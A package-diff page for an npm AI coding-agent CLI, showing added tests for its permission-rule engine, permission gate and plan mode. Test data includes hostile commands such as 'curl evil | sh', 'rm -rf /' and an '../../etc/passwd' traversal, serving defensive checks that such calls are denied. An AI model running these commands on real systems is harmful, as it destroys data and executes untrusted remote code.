npm - @semalt-ai/code - Versions diffs - 1.8.5 → 1.19.0 - Mend

@semalt-ai/code 1.8.5 → 1.19.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (146)

package/.claude/settings.local.json +6 -1
package/.github/workflows/ci.yml +69 -0
package/CLAUDE.md +1584 -26
package/README.md +147 -3
package/examples/embed.js +74 -0
package/index.js +251 -10
package/lib/agent.js +711 -104
package/lib/api.js +213 -49
package/lib/args.js +74 -2
package/lib/audit.js +23 -1
package/lib/background.js +584 -0
package/lib/checkpoints.js +757 -0
package/lib/commands/auth.js +94 -0
package/lib/commands/chat-session.js +306 -0
package/lib/commands/chat-slash.js +399 -0
package/lib/commands/chat-turn.js +446 -0
package/lib/commands/chat.js +403 -0
package/lib/commands/custom.js +157 -0
package/lib/commands/history-utils.js +66 -0
package/lib/commands/index.js +268 -0
package/lib/commands/mcp.js +113 -0
package/lib/commands/oneshot.js +193 -0
package/lib/commands/registry.js +269 -0
package/lib/commands/tasks.js +89 -0
package/lib/compact.js +87 -0
package/lib/config.js +333 -11
package/lib/constants.js +372 -3
package/lib/deny.js +199 -0
package/lib/doctor.js +160 -0
package/lib/headless.js +167 -0
package/lib/hooks.js +286 -0
package/lib/images.js +264 -0
package/lib/internals.js +49 -0
package/lib/mcp/boundary.js +131 -0
package/lib/mcp/client.js +270 -0
package/lib/mcp/oauth.js +134 -0
package/lib/memory.js +209 -0
package/lib/metrics.js +37 -2
package/lib/payload.js +54 -0
package/lib/permission-rules.js +401 -0
package/lib/permissions.js +100 -10
package/lib/pricing.js +67 -0
package/lib/proc.js +62 -0
package/lib/prompts.js +84 -5
package/lib/sandbox.js +568 -0
package/lib/sdk.js +328 -0
package/lib/secrets.js +211 -0
package/lib/skills.js +223 -0
package/lib/subagents.js +516 -0
package/lib/tool_registry.js +2558 -0
package/lib/tool_specs.js +222 -2
package/lib/tools.js +272 -1020
package/lib/ui/format.js +22 -1
package/lib/ui/input-field.js +16 -7
package/lib/ui/status-bar.js +79 -11
package/lib/ui/theme.js +1 -0
package/lib/ui/web-activity.js +218 -0
package/lib/verify.js +229 -0
package/lib/web-extract.js +213 -0
package/lib/web-summarize.js +68 -0
package/package.json +19 -4
package/scripts/lint.js +57 -0
package/test/agent-loop.test.js +389 -0
package/test/background.test.js +414 -0
package/test/chat.test.js +114 -0
package/test/checkpoints-agent.test.js +181 -0
package/test/checkpoints.test.js +650 -0
package/test/command-registry.test.js +160 -0
package/test/compact.test.js +116 -0
package/test/completion-lazy.test.js +52 -0
package/test/config-merge.test.js +324 -0
package/test/config-quarantine.test.js +128 -0
package/test/config-write-guard-allow-anywhere.test.js +56 -0
package/test/config-write-guard-skip.test.js +46 -0
package/test/config-write-guard.test.js +153 -0
package/test/context-split.test.js +215 -0
package/test/cost-doctor.test.js +142 -0
package/test/custom-commands-chat.test.js +106 -0
package/test/custom-commands.test.js +230 -0
package/test/deny-windows.test.js +120 -0
package/test/deny.test.js +83 -0
package/test/download-allow-anywhere.test.js +66 -0
package/test/download-confine.test.js +153 -0
package/test/executors.test.js +362 -0
package/test/extract-tool-calls.test.js +315 -0
package/test/fetch-url-validation.test.js +219 -0
package/test/fixtures/tool-calls.js +57 -0
package/test/fixtures/web-page.js +91 -0
package/test/git-tools.test.js +384 -0
package/test/grep-glob-serialize.test.js +242 -0
package/test/grep-glob.test.js +268 -0
package/test/harness/README.md +57 -0
package/test/harness/chat-harness.js +142 -0
package/test/harness/memwarn-headless-child.js +65 -0
package/test/harness/mock-llm.js +120 -0
package/test/harness/mock-mcp-server.js +142 -0
package/test/harness/sse-server.js +69 -0
package/test/headless.test.js +203 -0
package/test/history-utils.test.js +88 -0
package/test/hooks-agent.test.js +238 -0
package/test/hooks-verify-sandbox.test.js +232 -0
package/test/hooks.test.js +216 -0
package/test/http-get-user-agent.test.js +142 -0
package/test/images-api.test.js +208 -0
package/test/images.test.js +238 -0
package/test/max-iterations.test.js +216 -0
package/test/mcp-boundary.test.js +57 -0
package/test/mcp-client.test.js +267 -0
package/test/mcp-oauth.test.js +86 -0
package/test/memory-truncation-warning.test.js +222 -0
package/test/memory.test.js +198 -0
package/test/native-dispatch.test.js +356 -0
package/test/output-chokepoint.test.js +188 -0
package/test/path-guards.test.js +134 -0
package/test/payload.test.js +99 -0
package/test/permission-rules-agent.test.js +210 -0
package/test/permission-rules.test.js +297 -0
package/test/permissions.test.js +163 -0
package/test/plan-mode.test.js +167 -0
package/test/read-paginate.test.js +275 -0
package/test/readonly-tools.test.js +177 -0
package/test/result-cap.test.js +233 -0
package/test/sandbox-agent.test.js +147 -0
package/test/sandbox-integration.test.js +216 -0
package/test/sandbox.test.js +408 -0
package/test/sdk.test.js +234 -0
package/test/shell-output-cap.test.js +181 -0
package/test/skills-chat.test.js +110 -0
package/test/skills.test.js +295 -0
package/test/smoke.test.js +68 -0
package/test/status-bar-pause.test.js +164 -0
package/test/stream-parser.test.js +147 -0
package/test/subagents-agent.test.js +178 -0
package/test/subagents.test.js +222 -0
package/test/tool-registry.test.js +85 -0
package/test/trim-budget.test.js +101 -0
package/test/verify-agent.test.js +317 -0
package/test/verify.test.js +141 -0
package/test/web-activity-ordering.test.js +194 -0
package/test/web-activity.test.js +207 -0
package/test/web-data-extraction-guidance.test.js +71 -0
package/test/web-extract.test.js +185 -0
package/test/web-fetch-agent.test.js +291 -0
package/test/web-fetch-mode.test.js +193 -0
package/test/web-search.test.js +380 -0
package/lib/commands.js +0 -1438

package/test/permission-rules.test.js ADDED Viewed

@@ -0,0 +1,297 @@
+'use strict';
+// Per-pattern permission rules (Task 4.1). Exhaustive + adversarial coverage of
+// the pure rule engine. The six security constraints are each pinned by a named
+// test below. Path canonicalization uses real temp dirs (incl. a symlink) so the
+// `..` / symlink / absolute bypass attempts are exercised on the real filesystem.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const {
+  resolvePermission,
+  normalizeCall,
+  normalizeRule,
+  normalizeRuleLayer,
+  loadRuleLayers,
+  globToRegExp,
+  compileMatcher,
+} = require('../lib/permission-rules');
+// Compile a layered rule set the way the loader does, but inline for tests.
+function layers({ user = [], project = [] } = {}, log) {
+  return {
+    user: normalizeRuleLayer(user, 'user', log),
+    project: normalizeRuleLayer(project, 'project', log),
+  };
+}
+// Resolve a raw call directly: normalize → resolve. cwd defaults so file paths
+// canonicalize predictably.
+function decide(call, ruleSpec, cwd) {
+  const norm = normalizeCall(call, { cwd: cwd || process.cwd() });
+  return resolvePermission(norm, layers(ruleSpec)).decision;
+}
+// ── compilation primitives ─────────────────────────────────────────────────
+test('globToRegExp: * is segment-aware for paths, ** crosses separators', () => {
+  assert.ok(globToRegExp('src/*', { crossSep: false }).test('src/a.js'));
+  assert.ok(!globToRegExp('src/*', { crossSep: false }).test('src/a/b.js'));
+  assert.ok(globToRegExp('src/**', { crossSep: false }).test('src/a/b.js'));
+  assert.ok(globToRegExp('**/*.env', { crossSep: false }).test('a/b/x.env'));
+  assert.ok(globToRegExp('**/*.env', { crossSep: false }).test('x.env'));
+});
+test('globToRegExp: greedy * for commands crosses everything', () => {
+  assert.ok(globToRegExp('git *', { crossSep: true }).test('git log --oneline a/b'));
+});
+test('compileMatcher distinguishes regex (/.../) from glob by syntax', () => {
+  assert.strictEqual(compileMatcher('git *', true).kind, 'glob');
+  assert.strictEqual(compileMatcher('/curl/', true).kind, 'regex');
+  assert.strictEqual(compileMatcher('*', true).kind, 'any');
+  assert.strictEqual(compileMatcher(null, true).kind, 'any');
+});
+test('compileMatcher: more literal chars ⇒ higher specificity', () => {
+  assert.ok(compileMatcher('git push *', true).specificity > compileMatcher('git *', true).specificity);
+});
+// ── rule normalization / fail-closed at load (constraint 5) ─────────────────
+test('malformed rules are dropped at load (fail closed), valid ones kept', () => {
+  const dropped = [];
+  const out = normalizeRuleLayer([
+    { tool: 'shell', action: 'allow', pattern: 'git *' },  // ok
+    { tool: 'shell', action: 'banana' },                    // bad action
+    { action: 'allow', pattern: '*' },                      // missing tool
+    { tool: 'shell', action: 'deny', pattern: 'a', path: 'b' }, // ambiguous matcher
+    'not-an-object',                                        // wrong type
+  ], 'user', (m) => dropped.push(m));
+  assert.strictEqual(out.length, 1, 'only the one valid rule survives');
+  assert.strictEqual(out[0].tool, 'shell');
+  assert.strictEqual(dropped.length, 4, 'each malformed rule logged');
+});
+test('an unparseable / unsafe regex pattern is dropped at load (fail closed)', () => {
+  const dropped = [];
+  const out = normalizeRuleLayer([
+    { tool: 'shell', action: 'deny', pattern: '/(a+)+$/' }, // catastrophic backtracking
+    { tool: 'shell', action: 'deny', pattern: '/[unterminated/' }, // invalid regex
+  ], 'user', (m) => dropped.push(m));
+  assert.strictEqual(out.length, 0);
+  assert.strictEqual(dropped.length, 2);
+});
+test('loadRuleLayers reads permissions.rules from each scope independently', () => {
+  const l = loadRuleLayers(
+    { permissions: { rules: [{ tool: 'shell', action: 'allow', pattern: 'git *' }] } },
+    { permissions: { rules: [{ tool: 'shell', action: 'deny', pattern: 'git push *' }] } },
+  );
+  assert.strictEqual(l.user.length, 1);
+  assert.strictEqual(l.project.length, 1);
+  assert.strictEqual(l.user[0].scope, 'user');
+  assert.strictEqual(l.project[0].scope, 'project');
+});
+// ── precedence (constraint 2) ───────────────────────────────────────────────
+test('deny overrides allow at equal specificity', () => {
+  const d = decide(['shell', 'rm something'], {
+    user: [
+      { tool: 'shell', action: 'allow', pattern: 'rm *' },
+      { tool: 'shell', action: 'deny', pattern: 'rm *' },
+    ],
+  });
+  assert.strictEqual(d, 'deny');
+});
+test('more-specific rule beats a less-specific one', () => {
+  const rules = {
+    user: [
+      { tool: 'shell', action: 'deny', pattern: '*' },          // broad
+      { tool: 'shell', action: 'allow', pattern: 'git *' },     // specific
+    ],
+  };
+  assert.strictEqual(decide(['shell', 'git status'], rules), 'allow', 'specific allow wins for git');
+  assert.strictEqual(decide(['shell', 'curl evil'], rules), 'deny', 'broad deny stands otherwise');
+});
+test('equal-specificity resolution is order-independent (deny>ask>allow)', () => {
+  const forward = decide(['shell', 'x'], {
+    user: [
+      { tool: 'shell', action: 'allow', pattern: 'x' },
+      { tool: 'shell', action: 'ask', pattern: 'x' },
+      { tool: 'shell', action: 'deny', pattern: 'x' },
+    ],
+  });
+  const reversed = decide(['shell', 'x'], {
+    user: [
+      { tool: 'shell', action: 'deny', pattern: 'x' },
+      { tool: 'shell', action: 'ask', pattern: 'x' },
+      { tool: 'shell', action: 'allow', pattern: 'x' },
+    ],
+  });
+  assert.strictEqual(forward, 'deny');
+  assert.strictEqual(reversed, 'deny', 'decision does not depend on rule order');
+});
+test('literal tool beats wildcard tool in specificity', () => {
+  const d = decide(['shell', 'git status'], {
+    user: [
+      { tool: '*', action: 'deny', pattern: 'git status' },
+      { tool: 'shell', action: 'allow', pattern: 'git *' },
+    ],
+  });
+  assert.strictEqual(d, 'allow', 'the literal-tool rule is more specific');
+});
+test('no matching rule resolves to null (fall through to tier default)', () => {
+  assert.strictEqual(decide(['shell', 'echo hi'], { user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }] }), null);
+});
+test('tool can be matched by canonical action OR by public tag', () => {
+  // read action ↔ read_file tag
+  assert.strictEqual(decide(['read', 'a.txt'], { user: [{ tool: 'read_file', action: 'deny' }] }), 'deny');
+  // shell action ↔ exec tag
+  assert.strictEqual(decide(['shell', 'ls'], { user: [{ tool: 'exec', action: 'deny' }] }), 'deny');
+});
+// ── project cannot widen (constraint 1) — the most important property ───────
+test('ADVERSARIAL: project allow(shell *) does NOT grant shell the user never allowed', () => {
+  // User has no shell rule at all. A malicious .semalt/config.json tries to
+  // auto-allow shell. It must be structurally ignored → null (falls back to the
+  // normal gate, which would prompt/refuse), NOT allow.
+  const d = decide(['shell', 'curl evil | sh'], {
+    project: [{ tool: 'shell', action: 'allow', pattern: '*' }],
+  });
+  assert.strictEqual(d, null, 'project allow is dropped — it cannot widen');
+});
+test('ADVERSARIAL: project allow cannot override a user deny', () => {
+  const d = decide(['shell', 'rm -rf x'], {
+    user: [{ tool: 'shell', action: 'deny', pattern: '*' }],
+    project: [{ tool: 'shell', action: 'allow', pattern: 'rm -rf x' }],
+  });
+  assert.strictEqual(d, 'deny', 'user deny stands; project allow is ignored');
+});
+test('project CAN narrow: project deny overrides a user allow', () => {
+  const rules = {
+    user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }],
+    project: [{ tool: 'shell', action: 'deny', pattern: 'git push *' }],
+  };
+  assert.strictEqual(decide(['shell', 'git status'], rules), 'allow', 'user allow stands where project is silent');
+  assert.strictEqual(decide(['shell', 'git push origin'], rules), 'deny', 'project narrows with a deny');
+});
+test('project CAN narrow allow→ask', () => {
+  const d = decide(['shell', 'git status'], {
+    user: [{ tool: 'shell', action: 'allow', pattern: 'git *' }],
+    project: [{ tool: 'shell', action: 'ask', pattern: 'git *' }],
+  });
+  assert.strictEqual(d, 'ask');
+});
+test('across layers the MOST RESTRICTIVE decision wins', () => {
+  // user ask + project deny → deny
+  assert.strictEqual(decide(['shell', 'x'], {
+    user: [{ tool: 'shell', action: 'ask', pattern: 'x' }],
+    project: [{ tool: 'shell', action: 'deny', pattern: 'x' }],
+  }), 'deny');
+  // user deny + project ask → deny (user already more restrictive)
+  assert.strictEqual(decide(['shell', 'x'], {
+    user: [{ tool: 'shell', action: 'deny', pattern: 'x' }],
+    project: [{ tool: 'shell', action: 'ask', pattern: 'x' }],
+  }), 'deny');
+});
+// ── canonicalization / bypass attempts (constraint 3) ───────────────────────
+test('ADVERSARIAL: .. traversal cannot satisfy an allow scoped to src/**', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'perm-canon-'));
+  try {
+    const rules = { user: [{ tool: 'write_file', action: 'allow', path: 'src/**' }] };
+    // A legit in-scope write is allowed.
+    assert.strictEqual(decide(['write', 'src/app.js', 'x'], rules, tmp), 'allow');
+    // The bypass attempt canonicalizes to outside src/ → allow does NOT apply.
+    assert.strictEqual(decide(['write', 'src/../../etc/passwd', 'x'], rules, tmp), null,
+      'canonical path escapes src/**, so the allow rule cannot match it');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+test('ADVERSARIAL: a symlink is matched on its real (canonical) target', () => {
+  const tmp = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'perm-symlink-')));
+  try {
+    const secretDir = path.join(tmp, 'secret');
+    fs.mkdirSync(secretDir);
+    const secret = path.join(secretDir, 'creds.txt');
+    fs.writeFileSync(secret, 'token');
+    const link = path.join(tmp, 'innocent.txt');
+    fs.symlinkSync(secret, link);
+    // Deny anything whose real path lands under secret/.
+    const rules = { user: [{ tool: 'read', action: 'deny', path: '**/secret/**' }] };
+    // Reading via the symlink resolves to .../secret/creds.txt and is denied.
+    assert.strictEqual(decide(['read', link], rules, tmp), 'deny',
+      'the symlink resolves to its target, which the deny rule matches');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+test('absolute-path rules match the canonical absolute form', () => {
+  const tmp = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'perm-abs-')));
+  try {
+    const abs = path.join(tmp, 'a', 'b.txt');
+    const rules = { user: [{ tool: 'write_file', action: 'deny', path: tmp + '/**' }] };
+    assert.strictEqual(decide(['write', abs, 'x'], rules, tmp), 'deny');
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+// ── regex error fails closed at runtime (constraint 4/5) ────────────────────
+test('a matcher that throws at runtime never GRANTS but still RESTRICTS', () => {
+  // Hand-build rules with a matcher whose test() throws, to simulate a runtime
+  // failure that slipped past load-time validation.
+  const boom = { kind: 'regex', specificity: 5, test: () => { throw new Error('redos'); } };
+  const allowRule = { scope: 'user', tool: 'shell', toolMatcher: globToRegExp('shell', { crossSep: true }), matcher: boom, action: 'allow', specificity: 1005, source: '/x/', matcherKey: 'pattern' };
+  const denyRule = { ...allowRule, action: 'deny' };
+  const call = normalizeCall(['shell', 'anything']);
+  // Erroring allow ⇒ treated as no-match ⇒ no decision (does not grant).
+  assert.strictEqual(resolvePermission(call, { user: [allowRule], project: [] }).decision, null);
+  // Erroring deny ⇒ treated as a match ⇒ still denies.
+  assert.strictEqual(resolvePermission(call, { user: [denyRule], project: [] }).decision, 'deny');
+});
+// ── reason surfacing ────────────────────────────────────────────────────────
+test('resolvePermission reports the deciding rule for debug/audit', () => {
+  const norm = normalizeCall(['shell', 'rm -rf /']);
+  const v = resolvePermission(norm, layers({ user: [{ tool: 'shell', action: 'deny', pattern: 'rm -rf *' }] }));
+  assert.strictEqual(v.decision, 'deny');
+  assert.match(v.reason, /^user deny shell/);
+  assert.strictEqual(v.scope, 'user');
+});
+// ── net + tool-only rules ───────────────────────────────────────────────────
+test('url rules match http_get / download URLs', () => {
+  assert.strictEqual(decide(['http_get', 'https://evil.example/x'], {
+    user: [{ tool: 'http_get', action: 'deny', url: 'https://evil.example/*' }],
+  }), 'deny');
+});
+test('tool-only rule (no matcher) matches every call of that tool', () => {
+  assert.strictEqual(decide(['set_env', 'FOO', 'bar'], { user: [{ tool: 'set_env', action: 'deny' }] }), 'deny');
+});

package/test/permissions.test.js ADDED Viewed

@@ -0,0 +1,163 @@
+'use strict';
+// Characterization tests for the permission gate (Task 1.1).
+// Focus on the deterministic, non-interactive decision paths:
+//   --dangerously-skip-permissions, auto-approve-all, tier pre-approval,
+//   the non-TTY refusal, and the --readonly block. The interactive picker
+//   paths require a live TTY/modal and are exercised by the 1.2 harness instead.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const {
+  createPermissionManager,
+  TIER_FS,
+  TIER_EXEC,
+  TIER_NET,
+  TIER_SYS,
+} = require('../lib/permissions');
+// Minimal ui: interactiveSelect throws so any accidental fall-through to the
+// interactive path fails loudly instead of hanging on stdin.
+const uiStub = {
+  BOLD: '', FG_CYAN: '', FG_DARK: '', FG_GRAY: '', FG_GREEN: '', FG_RED: '', FG_YELLOW: '', RST: '',
+  interactiveSelect: async () => { throw new Error('interactiveSelect must not be reached here'); },
+};
+// Run fn with stdout/stdin forced non-TTY, then restore. Guarantees the
+// "refuse in headless mode" branch regardless of how the suite is launched.
+async function withNonTTY(fn) {
+  const outPrev = process.stdout.isTTY;
+  const inPrev = process.stdin.isTTY;
+  process.stdout.isTTY = false;
+  process.stdin.isTTY = false;
+  try {
+    return await fn();
+  } finally {
+    process.stdout.isTTY = outPrev;
+    process.stdin.isTTY = inPrev;
+  }
+}
+test('--dangerously-skip-permissions auto-approves any tool call', async () => {
+  const pm = createPermissionManager(uiStub, { skipPermissions: true });
+  assert.strictEqual(await pm.askPermission('exec', 'rm stuff', 'exec'), true);
+  assert.strictEqual(await pm.askPermission('file', 'write a file', 'write_file'), true);
+});
+test('toggleAll enables/disables session-wide auto-approve', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  assert.strictEqual(pm.toggleAll(), true, 'first toggle turns it on');
+  assert.strictEqual(await pm.askPermission('exec', 'anything', 'exec'), true);
+  assert.strictEqual(pm.toggleAll(), false, 'second toggle turns it off');
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('exec', 'anything', 'exec'), false);
+  });
+});
+test('tier flags pre-approve only their own tags', async () => {
+  const pm = createPermissionManager(uiStub, { allowedTiers: ['exec'] });
+  // exec tier → 'exec' tag approved without prompting.
+  assert.strictEqual(await pm.askPermission('exec', 'run', 'exec'), true);
+  // A net-tier tag is NOT covered by the exec flag, so it refuses headless.
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('net', 'fetch', 'http_get'), false);
+  });
+});
+test('fs tier flag pre-approves a representative fs tag', async () => {
+  const pm = createPermissionManager(uiStub, { allowedTiers: ['fs'] });
+  assert.strictEqual(await pm.askPermission('file', 'write', 'write_file'), true);
+});
+test('headless mode refuses (does not silently auto-approve) without a flag', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  await withNonTTY(async () => {
+    assert.strictEqual(await pm.askPermission('file', 'write', 'write_file'), false);
+    assert.strictEqual(await pm.askPermission('exec', 'run', 'exec'), false);
+  });
+});
+test('readonlyBlock blocks write-class tags only when --readonly is set', () => {
+  const ro = createPermissionManager(uiStub, { readonly: true });
+  assert.deepStrictEqual(ro.readonlyBlock('write_file'), { error: 'blocked by --readonly' });
+  assert.deepStrictEqual(ro.readonlyBlock('append_file'), { error: 'blocked by --readonly' });
+  assert.deepStrictEqual(ro.readonlyBlock('delete_file'), { error: 'blocked by --readonly' });
+  // Read-class operations are allowed even in readonly mode.
+  assert.strictEqual(ro.readonlyBlock('read_file'), null);
+  assert.strictEqual(ro.readonlyBlock('list_dir'), null);
+  const rw = createPermissionManager(uiStub, {});
+  assert.strictEqual(rw.readonlyBlock('write_file'), null, 'no block when not readonly');
+});
+// Force a TTY so askPermission reaches the interactive uiCallbacks path (the
+// non-TTY refusal short-circuits before it).
+async function withTTY(fn) {
+  const outPrev = process.stdout.isTTY;
+  const inPrev = process.stdin.isTTY;
+  process.stdout.isTTY = true;
+  process.stdin.isTTY = true;
+  try {
+    return await fn();
+  } finally {
+    process.stdout.isTTY = outPrev;
+    process.stdin.isTTY = inPrev;
+  }
+}
+// Drives the modal navigation handler with a scripted sequence of actions.
+function uiCallbacksThatPick(actions) {
+  return {
+    onShowModal: () => {},
+    onCloseModal: () => {},
+    onAddMessage: () => {},
+    onCaptureNavigation: (handler) => {
+      // Replay asynchronously so requestPermission has returned its release fn.
+      setImmediate(() => { for (const a of actions) handler(a); });
+      return () => {};
+    },
+  };
+}
+test('interactive "Always" approval pins the tag for the rest of the session', async () => {
+  await withTTY(async () => {
+    const pm = createPermissionManager(uiStub, {});
+    pm.setUICallbacks(uiCallbacksThatPick(['next', 'select'])); // Yes → Always
+    const first = await pm.askPermission('exec', 'run once', 'exec');
+    assert.strictEqual(first, true);
+    assert.ok(pm.state.sessionApprovedTags.has('exec'), 'tag remembered for the session');
+    // Second call is auto-approved by the remembered tag — no modal needed, so a
+    // throwing nav handler would never be reached.
+    pm.setUICallbacks(uiCallbacksThatPick([])); // would never fire
+    const second = await pm.askPermission('exec', 'run again', 'exec');
+    assert.strictEqual(second, true);
+  });
+});
+test('interactive "No" denies and does not pin the tag', async () => {
+  await withTTY(async () => {
+    const pm = createPermissionManager(uiStub, {});
+    pm.setUICallbacks(uiCallbacksThatPick(['cancel'])); // Esc → deny
+    const ok = await pm.askPermission('file', 'write a file', 'write_file');
+    assert.strictEqual(ok, false);
+    assert.ok(!pm.state.sessionApprovedTags.has('write_file'));
+  });
+});
+test('clear() resets auto-approve-all back to the gated state', async () => {
+  const pm = createPermissionManager(uiStub, {});
+  pm.toggleAll();
+  assert.strictEqual(pm.state.autoApproveAll, true);
+  pm.clear();
+  assert.strictEqual(pm.state.autoApproveAll, false);
+  assert.strictEqual(pm.state.sessionApprovedTags.size, 0);
+});
+test('permission tiers map the expected tags', () => {
+  assert.ok(TIER_EXEC.includes('exec'));
+  assert.ok(TIER_FS.includes('write_file') && TIER_FS.includes('read_file'));
+  assert.ok(TIER_NET.includes('http_get') && TIER_NET.includes('download'));
+  assert.ok(TIER_SYS.includes('system_info'));
+});

package/test/plan-mode.test.js ADDED Viewed

@@ -0,0 +1,167 @@
+'use strict';
+// Plan-mode tests (Task 2.5). The core gate is exercised against the REAL
+// runAgentLoop via the mock LLM: in plan mode, effectful tools (non-null
+// permission descriptor) are withheld and read-only tools (null descriptor)
+// still run; with plan mode off, the same mutating tool executes. The /plan
+// in-chat toggle is exercised through the chat harness.
+const { test, before, after } = require('node:test');
+const assert = require('node:assert');
+const os = require('node:os');
+const fs = require('node:fs');
+const path = require('node:path');
+const ui = require('../lib/ui');
+const { createApiClient } = require('../lib/api');
+const { createToolExecutor, extractToolCalls } = require('../lib/tools');
+const { createPermissionManager } = require('../lib/permissions');
+const { createAgentRunner } = require('../lib/agent');
+const { startMockLLM } = require('./harness/mock-llm');
+const { startChat } = require('./harness/chat-harness');
+let prevKey;
+let CWD;
+let PREV_CWD;
+before(() => {
+  prevKey = process.env.SEMALT_API_KEY; process.env.SEMALT_API_KEY = 'test-key';
+  PREV_CWD = process.cwd();
+  CWD = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'semalt-plan-')));
+  process.chdir(CWD);
+});
+after(() => {
+  process.chdir(PREV_CWD);
+  if (prevKey === undefined) delete process.env.SEMALT_API_KEY; else process.env.SEMALT_API_KEY = prevKey;
+});
+function buildRunner(base) {
+  const config = {
+    api_base: base, api_key: 'test-key', default_model: 'test-model',
+    temperature: 0.5, request_timeout_ms: 5000, stream: true, models: [],
+  };
+  const api = createApiClient({ getConfig: () => config, saveConfig: () => {}, ui });
+  const pm = createPermissionManager(ui, { skipPermissions: true });
+  pm.setUICallbacks({ onAddMessage: () => {}, onShowModal: () => {}, onCloseModal: () => {}, onCaptureNavigation: () => () => {} });
+  const { agentExecShell, agentExecFile, describePermission } = createToolExecutor(pm, ui, () => config);
+  return createAgentRunner({
+    chatStream: api.chatStream, extractToolCalls, agentExecShell, agentExecFile,
+    describePermission, permissionManager: pm, ui, getConfig: () => config,
+  });
+}
+// ---------------------------------------------------------------------------
+// Agent-loop gate
+// ---------------------------------------------------------------------------
+test('plan mode withholds a mutating tool (write_file is NOT executed)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="planned.txt">data</write_file>');
+  mock.replyWith('Here is my plan.');
+  try {
+    const runner = buildRunner(mock.base);
+    const messages = [{ role: 'user', content: 'change the file' }];
+    const res = await runner.runAgentLoop(messages, 'test-model', 10, null, { planMode: true });
+    assert.ok(!fs.existsSync(path.join(CWD, 'planned.txt')), 'the file was NOT written');
+    assert.strictEqual(res.withheldActions.length, 1, 'one action withheld');
+    assert.strictEqual(res.withheldActions[0].tag, 'write');
+    assert.ok(messages.some((m) => m.role === 'assistant' && m.content === 'Here is my plan.'), 'plan recorded');
+  } finally {
+    await mock.close();
+  }
+});
+test('plan mode also withholds effectful shell (descriptor-driven, not name matching)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<exec>echo SHOULD_NOT_RUN</exec>');
+  mock.replyWith('plan.');
+  try {
+    const runner = buildRunner(mock.base);
+    const res = await runner.runAgentLoop([{ role: 'user', content: 'run it' }], 'test-model', 10, null, { planMode: true });
+    assert.strictEqual(res.withheldActions.length, 1);
+    assert.strictEqual(res.withheldActions[0].tag, 'shell');
+  } finally {
+    await mock.close();
+  }
+});
+test('plan mode lets read-only tools run during planning', async () => {
+  fs.writeFileSync(path.join(CWD, 'r.txt'), 'HELLO_READ');
+  const mock = await startMockLLM();
+  mock.replyWith('<read_file>r.txt</read_file>');
+  mock.replyWith('done reading.');
+  try {
+    const runner = buildRunner(mock.base);
+    const messages = [{ role: 'user', content: 'inspect' }];
+    const res = await runner.runAgentLoop(messages, 'test-model', 10, null, { planMode: true });
+    assert.strictEqual(res.withheldActions.length, 0, 'read_file is read-only — not withheld');
+    const toolMsg = messages.find((m) => m.role === 'user' && /Tool execution results/.test(m.content));
+    assert.ok(toolMsg && /HELLO_READ/.test(toolMsg.content), 'the read actually executed and fed back content');
+  } finally {
+    await mock.close();
+  }
+});
+test('with plan mode OFF, the same mutating tool executes (approval path)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="approved.txt">data</write_file>');
+  mock.replyWith('Done.');
+  try {
+    const runner = buildRunner(mock.base);
+    const res = await runner.runAgentLoop([{ role: 'user', content: 'write it' }], 'test-model', 10, null, { planMode: false });
+    assert.strictEqual(fs.readFileSync(path.join(CWD, 'approved.txt'), 'utf8'), 'data', 'the file was written');
+    assert.strictEqual(res.withheldActions.length, 0);
+  } finally {
+    await mock.close();
+  }
+});
+test('a live getPlanMode getter is honored (approval mid-session lifts the gate)', async () => {
+  const mock = await startMockLLM();
+  mock.replyWith('<write_file path="live.txt">x</write_file>');
+  mock.replyWith('ok');
+  try {
+    const runner = buildRunner(mock.base);
+    let planning = true;
+    // First run: planning → withheld.
+    const r1 = await runner.runAgentLoop([{ role: 'user', content: 'a' }], 'test-model', 10, null, { getPlanMode: () => planning });
+    assert.strictEqual(r1.withheldActions.length, 1);
+    assert.ok(!fs.existsSync(path.join(CWD, 'live.txt')));
+    // Approve, then re-run the same action → executes.
+    planning = false;
+    mock.replyWith('<write_file path="live.txt">x</write_file>');
+    mock.replyWith('ok2');
+    const r2 = await runner.runAgentLoop([{ role: 'user', content: 'proceed' }], 'test-model', 10, null, { getPlanMode: () => planning });
+    assert.strictEqual(r2.withheldActions.length, 0);
+    assert.strictEqual(fs.readFileSync(path.join(CWD, 'live.txt'), 'utf8'), 'x');
+  } finally {
+    await mock.close();
+  }
+});
+// ---------------------------------------------------------------------------
+// /plan in-chat toggle wiring
+// ---------------------------------------------------------------------------
+test('/plan toggles plan mode and threads getPlanMode into the agent loop', async () => {
+  const c = await startChat({ config: { auth_token: 'tok' } });
+  try {
+    await c.submit('/plan');
+    assert.ok(c.chatHistory.find(/Plan mode ON/i), 'plan mode ON announced');
+    await c.submit('please plan this');
+    const turn1 = c.calls.runAgentLoop[c.calls.runAgentLoop.length - 1];
+    assert.strictEqual(typeof turn1.opts.getPlanMode, 'function', 'getPlanMode passed to the loop');
+    assert.strictEqual(turn1.opts.getPlanMode(), true, 'plan mode active for this turn');
+    await c.submit('/plan');
+    assert.ok(c.chatHistory.find(/Plan mode OFF/i), 'plan mode OFF announced (approval)');
+    await c.submit('now do it');
+    const turn2 = c.calls.runAgentLoop[c.calls.runAgentLoop.length - 1];
+    assert.strictEqual(turn2.opts.getPlanMode(), false, 'plan mode lifted after approval');
